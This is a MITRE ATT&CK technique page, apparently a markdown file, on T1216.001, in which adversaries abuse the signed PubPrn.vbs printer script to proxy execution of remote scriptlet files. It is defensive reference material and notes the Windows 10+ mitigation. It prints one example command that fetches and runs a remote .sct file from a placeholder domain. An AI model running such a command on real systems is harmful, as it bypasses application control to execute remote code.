---
layout: technique
title: PubPrn
mitre_id: T1216.001
permalink: "/techniques/T1216.001/"
mitre_url: https://attack.mitre.org/techniques/T1216/001
domains:
- enterprise
parent_mitre_id: T1216
source_attribution: "© The MITRE Corporation. This work is reproduced and distributed
  with the permission of The MITRE Corporation."
tactic_ids:
- TA0005
attack_version: '19.0'
---

## Description

Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.[pubprn](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn)

Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.[Enigma0x3 PubPrn Bypass](https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.

In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).

## Threat actors

Threat actors in this project are listed below when their ATT&CK references cite this technique ID.


---

*© The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.*
